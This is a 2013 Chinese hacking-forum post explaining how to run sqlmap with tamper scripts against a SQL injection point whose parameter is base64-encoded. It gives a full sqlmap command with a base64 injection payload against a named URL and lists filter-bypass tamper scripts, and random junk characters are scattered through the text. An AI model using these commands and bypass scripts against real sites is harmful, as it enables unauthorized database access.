找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2173|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
2 |" j' \. J8 Y5 k6 G6 s
( t: W+ d0 L$ ^2 T; csqlmap的tamper里有个base64encode.py
, R$ w" [/ `9 K) _1 A
+ }5 O% b5 o# \; F% R' |) z+ i使用如下# b8 |; ]* c- K# a* C! ]3 {
. A9 X( Z5 {* q1 C" a9 _
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
" i6 t- ]! B! Y8 @* M+ H) G/ y4 f' R( D% f3 W1 B/ R

# R8 t; N0 ^! H& B: u3 Vsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”4 M0 B& X9 \9 G* v: r& r
/ |4 S; l# G! b5 b, _; I
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:% l' u7 T* w/ A9 z
$ K; T5 h/ o  m4 V; v+ m6 N: Y
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
- x' x/ l6 c) v7 ^8 z$ ^space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
; i$ t8 Y# x9 S  e首先确定目标数据库版本,然后选择相应的脚本。
/ X9 S% G) L0 Z: w-v 3 --batch --tamper "space2hash.py"
7 g: V8 g4 o7 F; D8 r- {# r' T6 s/ [* R
还有其他一些插件:
+ B; H# t  B5 U  O5 H% V; i0 H7 Uencodes编码 ——charencode.py+ L3 a: Y- D. z
base64编码 —— base64encode.py
3 r1 K; c, w2 h* H" [& ~& W替换空格和关键字 —— halfversionedmorekeywords.py
% L3 N  [1 {2 m5 W
3 b6 S7 v( J4 H) I0 P. m
2 n6 [2 [" I1 ^

) G( G' r9 s; Q+ E' V3 [. e, ]+ x$ k, D. l2 f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表